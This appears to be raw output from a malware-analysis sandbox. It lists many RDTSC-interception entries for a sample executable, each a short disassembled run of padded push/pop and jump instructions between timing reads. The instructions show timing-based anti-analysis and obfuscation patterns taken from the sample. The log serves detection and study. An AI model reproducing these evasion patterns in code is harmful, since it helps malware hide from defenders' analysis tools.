Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1320F4C second address: 1320F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1321220 second address: 1321224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1321224 second address: 132122F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13213A1 second address: 13213BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527175h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13213BC second address: 13213C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F474CE395F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13213C6 second address: 13213DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F474D527166h 0x00000010 ja 00007F474D527166h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13216BF second address: 13216C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 132181B second address: 1321853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D527175h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F474D527175h 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1321C33 second address: 1321C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39604h 0x00000007 jns 00007F474CE395F6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F474CE395F6h 0x00000017 push eax 0x00000018 pop eax 0x00000019 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1325A3A second address: 1325A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1325A40 second address: 1325A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE39607h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 132A2A9 second address: 132A2AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ECA39 second address: 12D4B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F474CE39607h 0x0000000c popad 0x0000000d push eax 0x0000000e jmp 00007F474CE395FEh 0x00000013 nop 0x00000014 jo 00007F474CE395F8h 0x0000001a mov dh, ah 0x0000001c lea eax, dword ptr [ebp+12BC47A0h] 0x00000022 sub dword ptr [ebp+12A224EBh], ecx 0x00000028 push eax 0x00000029 jmp 00007F474CE395FDh 0x0000002e mov dword ptr [esp], eax 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F474CE395F8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b je 00007F474CE395F7h 0x00000051 cmc 0x00000052 call dword ptr [ebp+12A22F69h] 0x00000058 push esi 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED04B second address: 12ED061 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F474D52716Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED061 second address: 12ED06B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F474CE395FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED06B second address: 12ED096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edi 0x0000000b jmp 00007F474D527173h 0x00000010 pop edi 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jbe 00007F474D52716Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED096 second address: 12ED09A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED09A second address: 12ED09F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED09F second address: 12ED0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED584 second address: 12ED588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED8E0 second address: 12ED8E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12ED8E4 second address: 12ED91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007F474D52716Eh 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F474D527168h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 0000001Eh 0x0000002a push eax 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EDCB1 second address: 12EDD0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F474CE395F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F474CE395F8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov ecx, esi 0x0000002d pushad 0x0000002e mov di, 7CC4h 0x00000032 xor esi, dword ptr [ebp+12A22B8Ch] 0x00000038 popad 0x00000039 lea eax, dword ptr [ebp+12BC47E4h] 0x0000003f mov edi, 210DA866h 0x00000044 nop 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007F474CE395FCh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 12EDD0E second address: 12EDD14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1329482 second address: 1329486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1329486 second address: 132949A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D52716Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 132949A second address: 13294A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1329702 second address: 1329708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1329708 second address: 132970C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 132970C second address: 1329710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1329876 second address: 132989A instructions: 0x00000000 rdtsc 0x00000002 js 00007F474CE3960Eh 0x00000008 jmp 00007F474CE39606h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13299ED second address: 13299F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13299F3 second address: 1329A07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnl 00007F474CE395F6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F474CE395F6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1329A07 second address: 1329A0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133345A second address: 1333460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1333460 second address: 133346C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133346C second address: 1333487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39607h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1331DF3 second address: 1331DFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1331FA2 second address: 1331FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1331FA7 second address: 1331FC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D527174h 0x00000009 jg 00007F474D527166h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13320E2 second address: 13320E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13320E6 second address: 13320F2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F474D527166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13320F2 second address: 1332160 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F474CE395F8h 0x00000008 jo 00007F474CE395FEh 0x0000000e jns 00007F474CE395F6h 0x00000014 push eax 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jmp 00007F474CE395FCh 0x00000020 jmp 00007F474CE39607h 0x00000025 pop ecx 0x00000026 push edx 0x00000027 jmp 00007F474CE39603h 0x0000002c jmp 00007F474CE39608h 0x00000031 pop edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1332160 second address: 1332165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1332165 second address: 133216B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13322C0 second address: 13322E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F474D527166h 0x0000000a popad 0x0000000b jmp 00007F474D52716Ah 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F474D527166h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13322E2 second address: 13322FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F474CE39601h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1332B1C second address: 1332B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F474D52716Ah 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1335CEE second address: 1335CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F474CE395FAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1335CFF second address: 1335D41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F474D527170h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jmp 00007F474D527173h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F474D527173h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1335D41 second address: 1335D72 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F474CE3960Bh 0x00000008 jmp 00007F474CE39605h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F474CE39600h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13358C1 second address: 13358CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F474D527166h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133DA77 second address: 133DA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133DA7D second address: 133DAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F474D52717Fh 0x0000000b jng 00007F474D52716Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133CFA4 second address: 133CFB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnc 00007F474CE395F8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133CFB7 second address: 133CFC6 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F474D527166h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133CFC6 second address: 133CFE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE39605h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133D4DA second address: 133D512 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474D527177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F474D52716Ch 0x0000000f jg 00007F474D527166h 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edx 0x00000019 jng 00007F474D527168h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 push edx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 133D512 second address: 133D52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE395FAh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F474CE395F6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13403CE second address: 13403D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13403D2 second address: 1340403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474CE395FEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F474CE39609h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1340403 second address: 1340407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1340561 second address: 1340567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1340567 second address: 1340577 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F474D527166h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13408FF second address: 1340909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F474CE395F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1340909 second address: 134090D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13473B9 second address: 13473C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F474CE395F6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13473C5 second address: 13473D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F474D527166h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13473D1 second address: 13473D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1345D29 second address: 1345D2F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1345D2F second address: 1345D35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13460F8 second address: 13460FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13460FC second address: 1346100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1346100 second address: 134610E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F474D527172h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1346560 second address: 1346595 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F474CE39604h 0x00000012 jc 00007F474CE395F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1346595 second address: 134659B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 13470CF second address: 13470D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134DFBF second address: 134DFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F474D52716Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134DFD1 second address: 134DFD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134E888 second address: 134E88C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134EDDE second address: 134EDE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F474CE395F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134EDE8 second address: 134EDEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134F094 second address: 134F0AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134F0AB second address: 134F0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F474D527180h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134F0D1 second address: 134F0E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F474CE395FAh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134F3D6 second address: 134F3E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F474D527166h 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 134F3E1 second address: 134F408 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F474CE395F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F474CE39609h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1354550 second address: 1354554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\WP6s7cCLzr.exeRDTSC instruction interceptor: First address: 1354554 second address: 135456B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F474CE39603h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
